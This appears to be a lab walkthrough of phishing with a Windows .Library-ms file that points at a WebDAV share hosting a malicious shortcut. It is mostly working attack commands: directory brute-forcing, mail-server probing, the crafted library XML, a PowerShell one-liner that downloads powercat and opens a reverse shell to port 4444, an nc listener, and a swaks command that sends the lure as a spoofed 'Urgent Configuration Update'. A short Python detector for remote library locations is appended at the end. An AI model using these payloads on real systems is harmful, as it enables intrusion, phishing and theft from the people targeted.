Published on June 5, 2025
Windows Library files (.Library-ms) are XML-based manifests that aggregate folders from various locations. By pointing them to remote WebDAV shares hosting a malicious .lnk, you can trigger code execution when a user opens the library.
First, we brute-force common directory and file names, trying the extensions pdf, txt, zip, docx, doc and docm:
gobuster dir \
-u http://192.168.152.199 \
-w /usr/share/wordlists/dirb/common.txt \
-x pdf,txt,zip,docx,doc,docm
Download one of the discovered PDFs and inspect its metadata:
wget http://192.168.152.199/secret/document.pdf
exiftool document.pdf | grep -i email
If the attacker embedded their address in the metadata, you’ll see something like:
Email: attacker@target.com
We connect with telnet to probe POP3, IMAP and SMTP and learn useful commands:
$ telnet 192.168.152.199 110
+OK POP3 server ready
USER test@target.com
+OK Send your password
PASS S3cr3t123
+OK Logged in.
STAT
+OK 3 560
LIST
+OK
1 200
2 180
3 180
.
RETR 1
+OK 200 octets
From: alice@target.com
Subject: Hello
Body...
.
QUIT
+OK POP3 server saying goodbye
$ telnet 192.168.152.199 143
* OK hMailServer IMAP4 ready
A001 CAPABILITY
* CAPABILITY IMAP4rev1 IDLE NAMESPACE QUOTA UIDPLUS
A001 OK CAPABILITY completed
A002 LOGIN test@target.com S3cr3t123
A002 OK LOGIN completed
A003 LIST "" "*"
* LIST (\HasNoChildren) "/" "Inbox"
* LIST (\HasNoChildren) "/" "Sent Items"
A003 OK LIST completed
A004 SELECT "Inbox"
* 5 EXISTS
A004 OK [READ-WRITE] SELECT completed
A005 FETCH 1:* (BODY[HEADER.FIELDS (FROM SUBJECT DATE)])
* 1 FETCH (BODY[HEADER.FIELDS (FROM SUBJECT DATE) {…}
* 2 FETCH (BODY[HEADER.FIELDS (FROM SUBJECT DATE) {…}
A005 OK FETCH completed
A006 LOGOUT
* BYE Logging out
A006 OK LOGOUT completed
$ telnet 192.168.152.199 25
220 ADMIN ESMTP
EHLO attacker.test
250-ADMIN
250-AUTH LOGIN
250 OK
AUTH LOGIN
<VXN…> ← base64(username)
<UGF…> ← base64(password)
235 authenticated.
MAIL FROM:<attacker@domain.com>
250 OK
RCPT TO:<victim@domain.com>
250 OK
DATA
Subject: Test Mail
Hello, this is a test.
.
250 OK id=12345
QUIT
221 Goodbye
Create config.Library-ms pointing to your WebDAV:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo><folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType></templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation><url>http://192.168.152.199/webdav</url></simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Start a WebDAV server that serves your malicious .lnk shortcut:
mkdir -p /home/user/webdav
# place evil.lnk (with reverse-shell) into /home/user/webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/user/webdav
Your evil.lnk contains a PowerShell one-liner reverse shell:
powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.152.199:8000/powercat.ps1'); powercat -c 192.168.152.199 -p 4444 -e cmd"
# On attacker machine:
cd /home/user/payloads
python3 -m http.server 8000
# In parallel, start a listener:
nc -lvnp 4444
Send the .Library-ms as an email attachment along with a phishing body:
swaks \
--to malcolm.stew@target.com \
--from dwight.kruger@target.com \
--auth LOGIN \
--auth-user dwight.kruger@target.com \
--auth-password test \
--attach @config.Library-ms \
--header "Subject: Urgent Configuration Update" \
--body body.txt \
--server 192.168.152.199 \
--quit-after RCPT \
--timeout 10
The victim sees a “Configuration Update” email and opens the attached library file, which points to your WebDAV and triggers the shortcut when clicked.
When config.Library-ms is opened, Explorer fetches http://192.168.152.199/webdav/evil.lnk. Clicking it launches the PowerShell reverse shell, connecting back to your nc -lvnp 4444 listener. You then:
whoami
net user
.Library-ms files and WebDAV activity.
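On the detection side, a mail gateway or triage script can parse a .Library-ms attachment and report any location that resolves to a remote host, which is exactly what the manifest above does. This is an added example, not code from the original post; the function names and the two sample manifests are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = "{http://schemas.microsoft.com/windows/2009/library}"

def is_remote(location: str) -> bool:
    """True for HTTP(S)/WebDAV URLs, UNC paths and file:// URLs naming a host."""
    loc = location.strip()
    if loc.startswith("\\\\"):                      # UNC form: \\host\share
        return True
    parsed = urlparse(loc)
    scheme = parsed.scheme.lower()
    return scheme in ("http", "https") or (scheme == "file" and bool(parsed.netloc))

def remote_locations(manifest: bytes) -> list[str]:
    """Return the remote <url> values found in a .Library-ms manifest."""
    # A library file has no reason to carry a DTD; refuse it rather than expand entities.
    if b"<!DOCTYPE" in manifest or b"<!ENTITY" in manifest:
        raise ValueError("DTD/entity declarations are not expected in a library file")
    root = ET.fromstring(manifest)
    if root.tag != NS + "libraryDescription":
        raise ValueError("not a library description")
    return [u.text.strip() for u in root.iter(NS + "url")
            if u.text and is_remote(u.text)]

# Constructed samples: REMOTE reuses the <url> from the manifest shown earlier,
# LOCAL is a benign library that points at a local folder.
TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
    "<searchConnectorDescriptionList><searchConnectorDescription>"
    "<simpleLocation><url>{}</url></simpleLocation>"
    "</searchConnectorDescription></searchConnectorDescriptionList>"
    "</libraryDescription>"
)
REMOTE = TEMPLATE.format("http://192.168.152.199/webdav").encode()
LOCAL = TEMPLATE.format(r"C:\Users\Public\Documents").encode()

if __name__ == "__main__":
    for name, data in (("remote", REMOTE), ("local", LOCAL)):
        print(name, remote_locations(data))
```

A non-empty result on an inbound attachment is a strong signal to quarantine, since legitimate libraries normally reference local or known folders.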